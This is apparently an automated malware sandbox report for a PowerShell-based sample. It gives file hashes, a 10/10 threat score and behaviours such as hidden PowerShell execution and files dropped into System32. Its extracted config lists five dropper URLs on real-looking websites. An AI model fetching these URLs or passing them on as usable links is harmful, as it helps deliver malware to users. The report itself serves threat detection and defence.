General

  • Target

    1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

  • Size

    203KB

  • Sample

    241113-pa9sga1ley

  • MD5

    170c6643bc47faf1f4b4d2b178921e81

  • SHA1

    bd27340f7a873e352860e90d3e6eb9df70f9e1f1

  • SHA256

    1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

  • SHA512

    0e164bc194d67bfffad1e9009eca73347195ffb94b0f7bcb1c55743524c4cb2c065280bdd437ac976c18f9871c832b26653e746787e10efde0e392c5d61f7e0b

  • SSDEEP

    3072:702y/GdyEktGDWLS0HZWD5w8K7Nk9pD7IBU4Cqz1Jf+49dl3lF:702k42tGiL3HJk9pD7b4Cqzf+4Hl3j

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://joaoleobarbieri.adv.br/test/l4d6638v6l-fotnu5m-867027278/

exe.dropper

http://kaplanforklift.com/web_map/PmTuIEQ/

exe.dropper

http://londontravel.com.ar/brc/HsGpuPR/

exe.dropper

https://leavenworthrental.com/calendar/aoo-ue7-653740/

exe.dropper

http://lareserva.com.py/aloja/AOISroJmq/

Targets

    • Target

      1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

    • Size

      203KB

    • MD5

      170c6643bc47faf1f4b4d2b178921e81

    • SHA1

      bd27340f7a873e352860e90d3e6eb9df70f9e1f1

    • SHA256

      1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4

    • SHA512

      0e164bc194d67bfffad1e9009eca73347195ffb94b0f7bcb1c55743524c4cb2c065280bdd437ac976c18f9871c832b26653e746787e10efde0e392c5d61f7e0b

    • SSDEEP

      3072:702y/GdyEktGDWLS0HZWD5w8K7Nk9pD7IBU4Cqz1Jf+49dl3lF:702k42tGiL3HJk9pD7b4Cqzf+4Hl3j

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks